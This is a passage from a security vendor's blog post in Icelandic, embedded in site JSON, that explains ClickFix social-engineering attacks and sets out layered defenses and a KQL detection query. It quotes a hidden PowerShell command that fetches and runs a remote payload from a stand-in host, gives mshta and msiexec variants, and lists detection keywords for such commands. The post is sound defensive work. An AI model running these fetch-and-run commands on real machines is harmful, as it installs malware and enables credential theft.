[{"data":1,"prerenderedAt":1121},["ShallowReactive",2],{"sc:header-data-is":3,"sc:footer-data-is":489,"author-is-fritz-zurhorst-11e6a2cbe4b79b":518,"content-is-fritz-zurhorst":542,"content-events-is-fritz-zurhorst":1105,"authors_data:Fritz Zurhorst|Nadine Klein":1106},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"is":13},{"title":14,"url":15,"alt":16},"Heim","/is","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"is":21},{"title":22,"description":23},"Workplace","Knúið af Microsoft 365 fyrir snjalla, örugga og sveigjanlega vinnustaði, með nútímalegri tækni og auðkennisþjónustum samþættum.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"is":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"is":34},{"title":35,"url":36},"Managed Intune","/is/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"is":40},{"title":41,"url":42},"Managed Entra","/is/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"is":46},{"title":47,"url":48},"Managed Workplace","/is/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"is":52},{"title":53,"url":54},"Consulting Services","/is/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"is":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"is":64},{"title":65,"url":66},"Microsoft Entra Suite","/is/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"is":70},{"title":71,"url":72},"Microsoft Intune","/is/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"is":76},{"title":77,"url":78},"Microsoft Windows","/is/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"is":82},{"title":83,"url":84},"Windows 365 Cloud PC","/is/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"is":88},{"title":89,"url":90},"Cloud Workplace Foundation","/is/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"is":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"is":100},{"title":101,"url":102},"Microsoft 365 Copilot","/is/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"is":106},{"title":107,"url":108},"Teams","/is/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"is":112},{"title":113,"url":114},"SharePoint & Power Platform","/is/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"is":118},{"title":119,"url":120},"Exchange Online","/is/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"is":124},{"title":125,"url":126},"Information Protection & Compliance","/is/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"is":130},{"title":131,"description":132},"Azure","Vöxtur með Azure: lækkaðu cloud-kostnað, auktu skilvirkni og knýðu áfram nýsköpun með IaaS og PaaS.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"is":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"is":142},{"title":143,"url":144},"Azure Managed Services","/is/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"is":148},{"title":149,"url":150},"Azure Consulting","/is/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"is":154},{"title":155},"Sviðsmyndir",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"is":160},{"title":161,"url":162},"Skipuleggðu skýið þitt","/is/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"is":166},{"title":167,"url":168},"Flyttu í skýið","/is/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"is":172},{"title":173,"url":174},"Nýsköpun í rekstrinum þínum","/is/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"is":178},{"title":179,"url":180},"Endurhugsaðu VMware-stefnuna þína","/is/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"is":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"is":190},{"title":191,"url":192},"Azure Foundation","/is/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"is":196},{"title":197,"url":198},"Azure AI Foundation","/is/azure/azure-ai-foundation",{"name":86,"languages":200},{"is":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"is":205},{"title":206,"url":207},"Azure Data Foundation","/is/azure/azure-data-foundation",{"name":188,"languages":209},{"is":210},{"title":211,"url":212},"Azure Container Foundation","/is/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"is":216},{"title":217,"url":218},"Managed Dark Tenant","/is/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"is":222},{"title":223,"url":224},"Cloud Adoption Framework","/is/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"is":228},{"title":229,"url":230},"Cloud Competence Center","/is/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"is":234},{"title":235,"description":236,"emergency":237},"Security","Árvekni í skýinu með margverðlaunaðri 24/7 managed service, incident response og nútímalegri vörn fyrir innviðina þína.",{"text":238,"href":239,"skin":240,"icon":241},"Undir árás?","/is/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"is":249},{"title":250,"url":251},"Managed Red Tenant","/is/security/managed-red-tenant",{"name":214,"languages":253},{"is":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"is":259},{"title":260,"url":261},"Sentinel Data Lake","/is/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"is":265},{"title":266,"url":267},"Security Consulting","/is/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"is":274},{"title":275,"url":276},"Cloud Security Operations Center","/is/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"is":280},{"title":281,"url":282},"Global Secure Access","/is/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"is":286},{"title":287,"url":288},"MyWorkID","/is/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"is":295},{"title":296,"url":297},"Preventive Services","/is/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"is":301},{"title":302,"url":303},"Data Security Service","/is/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"is":307},{"title":308,"url":309},"Security Copilot Agents","/is/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"is":313},{"title":314,"url":315},"Innleiðing NIS2","/is/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"is":319},{"title":320,"description":321},"Vörur","Fylgivörur fyrir öruggt, 100 % cloud-native Microsoft-umhverfi sem styrkja samstarf, netauðkenningu og hugbúnaðarstjórnun.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"is":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Skýbundin hugbúnaðardreifing",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"is":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Skírteinadreifing úr skýinu",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"is":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Vinndu með staðbundnu Office 365-gögnin þín",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"is":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Flyttu gögnin þín milli netþjóna",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"is":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider for Microsoft 365",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"is":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Auðkenning fyrir netið þitt",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"is":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Finndu tengiliði í Microsoft Teams",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"is":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Rauntímaeftirlit með Windows Autopilot",{"name":396,"languages":397},"casestudies",{"is":398},{"title":399,"url":400,"description":401},"Case Studies","/is/casestudies","Frumkvöðull í skýinu: Microsoft-samstarfsaðilinn þinn fyrir cloud-lausnir með blueprint-nálgun og sérþekkingu í Infrastructure-as-Code.",{"name":403,"languages":404,"children":407},"company",{"is":405},{"title":406,"description":401},"Fyrirtækið",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"is":411},{"title":412},"Um okkur",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"is":417},{"title":418,"url":419},"Staðreyndir og tölur","/is/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"is":423},{"title":424,"url":425},"Tengiliðir og staðsetningar","/is/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"is":429},{"title":430,"url":431}," glueckkanja Switzerland","/is/company/switzerland",{"name":433,"languages":434},"austria",{"is":435},{"title":436,"url":437},"glueckkanja Austria","/is/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"is":441},{"title":442},"Störf",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"is":447},{"title":448,"url":449},"Yfirlit yfir störf","/is/career",{"name":451,"languages":452},"company-young-professionals",{"is":453},{"title":454,"url":455},"Young Professionals","/is/young-professionals",{"name":457,"languages":458},"company-jobs",{"is":459},{"title":460,"url":461},"Laus störf","/is/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"is":465},{"title":466},"Nýjast",[468,474],{"name":469,"languages":470},"company-blog",{"is":471},{"title":472,"url":473},"Blogg","/is/blog",{"name":469,"languages":475},{"is":476},{"title":477,"url":478},"Viðburðir","/is/events",[480],{"name":481,"languages":482},"career-meta",{"is":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"is":487},{"title":488,"url":425,"active":484},"Tengiliður",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksIs":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Privacy","/is/privacy",{"title":514,"url":515},"Imprint","/is/imprint",{"title":507,"url":517},"/is/cookies",{"id":519,"title":520,"body":521,"description":527,"extension":532,"meta":533,"name":520,"navigation":325,"otherLanguages":534,"path":538,"seo":539,"stem":540,"__hash__":541},"authors/fritz-zurhorst.md","Fritz Zurhorst",{"type":522,"value":523,"toc":528},"minimal",[524],[525,526,527],"p",{},"Friedemann Zurhorst ist Cyber Security Architect bei glueckkanja. Sein Schwerpunkt liegt auf Identity Security: Er prüft gewachsene Active-Directory-Umgebungen in AD Security Reviews, begleitet Kunden bei der Einführung starker Authentifizierung und klassifiziert Privilegien nach dem Enterprise Access Model, unter anderem in EntraOps-Workshops. Dazu kommen Platform Engineering und die Arbeit am Managed Red Tenant, mit dem glueckkanja Kunden eine sichere administrative Umgebung bereitstellt.",{"title":529,"searchDepth":530,"depth":530,"links":531},"",2,[],"md",{},{"en":535,"es":536,"ja":537},"Friedemann Zurhorst is a Cyber Security Architect at glueckkanja. His focus is identity security. He assesses grown Active Directory environments in AD security reviews, guides customers through the rollout of strong authentication, and classifies privileges along the Enterprise Access Model, among other things in EntraOps workshops. On top of that comes platform engineering as well as work on the Managed Red Tenant, with which glueckkanja provides customers with a secure administrative environment.","Friedemann Zurhorst es Cyber Security Architect en glueckkanja. Su especialidad es la seguridad de identidades. Evalúa entornos de Active Directory que han crecido con los años en AD Security Reviews, acompaña a los clientes en la implantación de una autenticación fuerte y clasifica los privilegios según el Enterprise Access Model, entre otros en los workshops de EntraOps. A ello se suman el platform engineering y el trabajo en el Managed Red Tenant, con el que glueckkanja proporciona a sus clientes un entorno administrativo seguro.","Friedemann Zurhorstは、glueckkanjaのCyber Security Architectです。専門はIdentity Securityで、AD Security Reviewでは長年かけて積み上がったActive Directory環境を点検し、強力な認証の導入をお客様とともに進め、EntraOpsワークショップなどでEnterprise Access Modelに沿って特権を分類しています。あわせてPlatform Engineeringと、glueckkanjaがお客様に安全な管理環境を提供するManaged Red Tenantの開発にも携わっています。","/fritz-zurhorst",{"title":520,"description":527},"fritz-zurhorst","GMLpRIZsG9AhXoKwTKoJSiKYi53_8VC070ybXAUDQK4",[543],{"id":544,"title":545,"author":546,"body":548,"cta":494,"description":529,"eventid":494,"extension":532,"hideInRecent":484,"layout":1058,"meta":1059,"moment":1063,"navigation":325,"path":1097,"seo":1098,"stem":1099,"tags":1100,"webcast":484,"__hash__":1104},"content_is/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Þegar notandinn er exploitið, og hvernig þú stöðvar það",[520,547],"Nadine Klein",{"type":522,"value":549,"toc":1047},[550,555,558,561,568,576,579,585,588,607,618,624,630,633,637,639,642,645,649,651,654,668,672,674,681,760,777,780,784,786,789,804,807,810,814,816,819,822,847,851,853,856,863,867,869,872,898,901,904,907,1006,1009,1012,1015,1026,1029,1033,1035,1043],[551,552,554],"h2",{"id":553},"clickfix-árásarkeðjan","ClickFix-árásarkeðjan",[525,556,557],{},"{: .h3-font-size}",[525,559,560],{},"ClickFix er árás þar sem notendur verða sinn eigin árásaraðili. Ekkert exploit, enginn veikleiki. Þolandinn keyrir skaðkóðann sjálfur, með einu einasta copy-paste.",[525,562,563],{},[564,565],"img",{"alt":566,"src":567},"ClickFix-árásarkeðjan í fimm þrepum: beitan, brellan, copy-paste, keyrsla, smit.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[525,569,570,571,575],{},"Beitan er social engineering: falsað CAPTCHA á illgjarnri síðu, fölsk stuðningstilkynning (\"vafrinn þinn þarf uppfærslu\"), phishing-póstur eða fölsuð fundarsíða. Á meðan þolandinn er á síðunni skrifar JavaScript payloadið í klippiborðið um ",[572,573,574],"code",{},"clipboard.writeText()",". Svo biður síðan notandann um að ýta á Win+R, Ctrl+V og Enter. Keyrsluglugginn ræsir það sem liggur í klippiborðinu.",[525,577,578],{},"Dæmigerð beita lítur svona út:",[525,580,581],{},[564,582],{"alt":583,"src":584},"Skjámynd af falsaðri CAPTCHA-beitu sem biður notandann um að ýta á Win og X, líma svo inn og keyra skipun með Enter.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[525,586,587],{},"Skipunin sem hún setur í klippiborðið lítur svona út:",[589,590,592],"div",{"style":591},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[593,594,598],"pre",{"className":595,"code":596,"language":597,"meta":529,"style":529},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[572,599,600],{"__ignoreMap":529},[601,602,605],"span",{"class":603,"line":604},"line",1,[601,606,596],{},[525,608,609,610,613,614,617],{},"Tveir hlutir gerast samtímis. PowerShell ræsist í földum glugga (",[572,611,612],{},"-w h","), og ",[572,615,616],{},"iex(irm …)"," sækir payloadið og keyrir það beint í minninu. Ekkert lendir á disknum, svo signature-byggð antivirus hefur ekkert að skanna. Annað þrepið er oftast infostealer (Lumma, Vidar, RedLine, StealC), remote access trojan eða ransomware-loader.",[525,619,620,621,623],{},"Sama mynstur í Microsoft-Defender-telemetríunni, falið PowerShell, ræst úr Windows Terminal, sem keyrir ",[572,622,616],{},":",[525,625,626],{},[564,627],{"alt":628,"src":629},"Microsoft-Defender-inspect-record með ferlakeðjunni WindowsTerminal.exe í pwsh.exe í powershell.exe, sem keyrir iex(irm …)-skipun.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[525,631,632],{},"Hvers vegna þetta virkar svona vel: allt gengur í notandasamhenginu, án aukinna réttinda. Cookies, vistuð lykilorð og session tokens liggja innan seilingar venjulegs notanda. Árásaraðilinn þarf ekki að escalera réttindi til að ná því sem hann kom eftir.",[551,634,636],{"id":635},"hvað-microsoft-defender-greinir","Hvað Microsoft Defender greinir",[525,638,557],{},[525,640,641],{},"Microsoft hefur síðustu mánuði fjárfest mikið í ClickFix-greiningu. Sé Defender hjá þér heilbrigður og rétt stilltur færðu innbyggðar greiningar fyrir ClickFix-payload. Frá Q2 2025 gefur MDE út hegðunarbundin alerts undir titlum eins og \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\" eða \"An active 'Pacalau' malware in a command line was prevented from executing\". Þau fara í gang úr MDE-cloud-enginu um greiningu á ferlakeðjunni, samhliða AV-greiningunni og oft nokkrum sekúndum fyrr.",[525,643,644],{},"Stillingin sem gerir þetta mögulegt stendur neðar, við herðingu keyrslunnar.",[551,646,648],{"id":647},"hvar-innbyggða-greiningin-rekst-á-takmörk-sín","Hvar innbyggða greiningin rekst á takmörk sín",[525,650,557],{},[525,652,653],{},"Cloud-byggðar ML-signatures þurfa tíma þar til þær fara í gang. Við sjáum reglulega glufu upp á meira en mínútu milli PowerShell-ræsingar og Defender-alertsins. Hraðara payload smýgur í gegnum þennan glugga.",[525,655,656,657,659,660,663,664,667],{},"Árásaraðilar aðlagast auk þess hratt. Skiptu ",[572,658,597],{}," út fyrir ",[572,661,662],{},"mshta http://..."," eða ",[572,665,666],{},"msiexec /i http://...",", hvort tveggja klassísk LOLBin, og PowerShell-sértæku greiningarnar grípa ekki lengur.",[551,669,671],{"id":670},"að-loka-glufunni-runmru-hunt","Að loka glufunni: RunMRU-hunt",[525,673,557],{},[525,675,676,677,680],{},"Þessari glufu lokum við með custom detections. Útgangspunkturinn er KQL-fyrirspurn á registry-lykilinn ",[572,678,679],{},"RunMRU",", sem skrifar niður hverja skipun sem notandi slær inn í Win+R-gluggann.",[589,682,683],{"style":591},[593,684,688],{"className":685,"code":686,"language":687,"meta":529,"style":529},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[572,689,690,695,700,706,712,718,724,730,736,742,748,754],{"__ignoreMap":529},[601,691,692],{"class":603,"line":604},[601,693,694],{},"DeviceRegistryEvents\n",[601,696,697],{"class":603,"line":530},[601,698,699],{},"| where ActionType =~ \"RegistryValueSet\"\n",[601,701,703],{"class":603,"line":702},3,[601,704,705],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[601,707,709],{"class":603,"line":708},4,[601,710,711],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[601,713,715],{"class":603,"line":714},5,[601,716,717],{},"| where RegistryValueData has \" ✅ \"\n",[601,719,721],{"class":603,"line":720},6,[601,722,723],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[601,725,727],{"class":603,"line":726},7,[601,728,729],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[601,731,733],{"class":603,"line":732},8,[601,734,735],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[601,737,739],{"class":603,"line":738},9,[601,740,741],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[601,743,745],{"class":603,"line":744},10,[601,746,747],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[601,749,751],{"class":603,"line":750},11,[601,752,753],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[601,755,757],{"class":603,"line":756},12,[601,758,759],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[525,761,762,763,766,767,766,770,766,773,776],{},"Fyrirspurnin merkir hverja Win+R-færslu sem lítur út eins og ClickFix-skipun: PowerShell, mshta, curl eða msiexec ásamt dæmigerðum vísbendingum eins og ",[572,764,765],{},"-w hidden",", ",[572,768,769],{},"iex",[572,771,772],{},"irm",[572,774,775],{},"DownloadString"," eða base64-kóðuðum payload. Hún nær líka lúmsku brellunum. Græna hakemojiið sem margar falsaðar CAPTCHA-beitur setja framan við skipunina. Unicode-tákn úr kyrillískum, arabískum eða tælenskum sviðum, sem árásaraðilar nota til að dulbúa texta og komast fram hjá einföldum strengjasíum. Birtist eitt þessara mynstra í Win+R-færslu er mjög líklega ClickFix-árás í gangi.",[525,778,779],{},"Fyrir CSOC-viðskiptavini okkar rekum við þessa og fleiri custom detections til að loka glufunni milli nýrra árásartækni og innbyggðu greiningarinnar.",[551,781,783],{"id":782},"varnarlag-1-loka-á-afhendinguna","Varnarlag 1: loka á afhendinguna",[525,785,557],{},[525,787,788],{},"Nú að forvörnunum. ClickFix er útbreitt og árangursríkt, svo ein stök vörn dugar ekki. Við vinnum í lögum, allt frá afhendingu að keyrslu.",[525,790,791,792,795,796,799,800,803],{},"Network Protection lokar á þekkt delivery-domains og C2-þjóna fyrir alla vafra. MDE Web Content Filtering bætir við flokkum eins og \"Newly registered domains\", \"Hacking\" og \"Illegal Software\". Network Protection er innbyggð í Windows, en fyrir vafra frá þriðja aðila þarftu að slökkva á QUIC og ECH, því hvort tveggja dulkóðar alla tenginguna og felur markdómenið. Slökktu á QUIC í Chrome og Firefox með enterprise-policy (",[572,793,794],{},"QuicAllowed = Disabled"," í Chrome, ",[572,797,798],{},"network.http.http3.enable = false"," í Firefox); fyrir ECH setur þú ",[572,801,802],{},"EncryptedClientHelloEnabled = Disabled"," í Chrome.",[525,805,806],{},"Fyrir Edge kveikir þú á SmartScreen. Fyrir vafra frá þriðja aðila kveikir þú á innbyggðu Safe Browsing þeirra. Það er ekki það sama og Network Protection, en hjálpar til við að sía skaðlegar síður. Fyrir póstvektorinn athuga Safe Links og Safe Attachments tengla og viðhengi áður en notendur eiga við þau.",[525,808,809],{},"Gallinn: allt þetta grípur aðeins gegn þekktum innviðum. Núverandi ClickFix-herferðir ganga um nýskráða innviði sem eru auðkenndir og lokaðir of seint, og stundum um lögmætar síður sem árásaraðili hefur brotist inn í. Skoðum því hvað ver eftir að beitan hefur verið afhent.",[551,811,813],{"id":812},"varnarlag-2-loka-á-brelluna","Varnarlag 2: loka á brelluna",[525,815,557],{},[525,817,818],{},"Nokkrir Edge-eiginleikar hækka þröskuldinn á meðan notandinn er á illgjarnri síðu. Governance á browser-extensions kemur í veg fyrir að notendur setji upp illgjarnar eða brotnar viðbætur sem lauma inn ClickFix-overlayum eða meðhöndla klippiborðið sjálfar. Edge Enhanced Security Mode leggur strangari varnarráðstafanir á óþekktar og sjaldan heimsóttar síður (slökkt á JIT, Control Flow Guard, vélbúnaðarstudd stack-vörn), sem gerir exploit-byggðar vafrayfirtökur talsvert erfiðari. Typo Protection varar við typosquatted dómenum (micros0ft.com, paypa1.com) og lokar á útbreiddan ClickFix-afhendingarvektor um fölsuð vörumerkjadómen.",[525,820,821],{},"Tæknilegar stýringar eru aðeins hálfur sigurinn. Fræðsla notenda er áfram lykilatriði. Eina reglan sem ber stærsta hlutann: ef vefsíða biður þig um að líma eitthvað inn í tölvuna þína er það árás. Gerðu það konkret í awareness-þjálfuninni:",[823,824,826,827,826,835,826,841],"ul",{"style":825},"margin: 0.25rem 0","\n  ",[828,829,830,834],"li",{},[831,832,833],"strong",{},"Sýndu raunverulegar beitur:"," falsaðir \"Verify you are human\"-hakreitir, \"vafrinn þinn þarf uppfærslu\", \"ekki tókst að birta skjalið, keyrðu þennan fix\", bilaðar Teams- eða Zoom-hljóðtilkynningar.",[828,836,837,840],{},[831,838,839],{},"Sýndu klippiborðsbrelluna:"," sýndu hvernig síðan skrifar hljóðlega yfir klippiborðið.",[828,842,843,846],{},[831,844,845],{},"Gerðu tilkynningar auðveldar:"," hratt og án þess að kenna neinum um.",[551,848,850],{"id":849},"varnarlag-3-loka-á-aðgerðina","Varnarlag 3: loka á aðgerðina",[525,852,557],{},[525,854,855],{},"Hér eru nokkrir möguleikar á að herða kerfið, enginn þeirra er trygging. Byrjaðu á því að slökkva á keyrsluglugganum, það fjarlægir Win+R-inngangspunktinn. ClickFix-leiðbeiningar Microsoft mæla með að slökkva á honum, \"where it isn't necessary\". Það lokar tilteknu Win+R-paste-árásinni, en aðrar ræsingarleiðir standa eftir, til dæmis heimilisfangalína Explorer og Windows Terminal.",[525,857,858,859,862],{},"Þú getur að auki hert Edge með ",[572,860,861],{},"DefaultClipboardSetting",", sem kemur í veg fyrir að JavaScript skrifi hljóðlega í klippiborðið.",[551,864,866],{"id":865},"varnarlag-4-loka-á-keyrsluna","Varnarlag 4: loka á keyrsluna",[525,868,557],{},[525,870,871],{},"Áður en kemur að þróaðri eiginleikunum, komdu grunninum í lag. Fyrir ClickFix þýðir það:",[823,873,826,874,826,880,826,886,826,892],{"style":825},[828,875,876,879],{},[831,877,878],{},"Local admin reduction:"," fjarlægðu staðbundin stjórnandaréttindi af endanotendum þar sem hægt er, til að takmarka áhrif kóðakeyrslu.",[828,881,882,885],{},[831,883,884],{},"Endpoint Privilege Management (EPM):"," láttu notendur vinna sem venjulega notendur og elevera aðeins samþykkt forrit um policy-reglur.",[828,887,888,891],{},[831,889,890],{},"UAC-herðing:"," athugaðu secure-desktop-enforcement, prompt-hegðun fyrir admin og venjulega notendur og installer-greiningu.",[828,893,894,897],{},[831,895,896],{},"Credential Guard:"," einangraðu NTLM-hash, Kerberos-tickets og annað credential-efni með sýndarvæðingarbundnu öryggi, svo að credential-þjófnaður haldist erfiður, jafnvel þótt árásaraðili nái stjórnandaréttindum.",[525,899,900],{},"Þessar stýringar draga úr möguleikum á escalation, 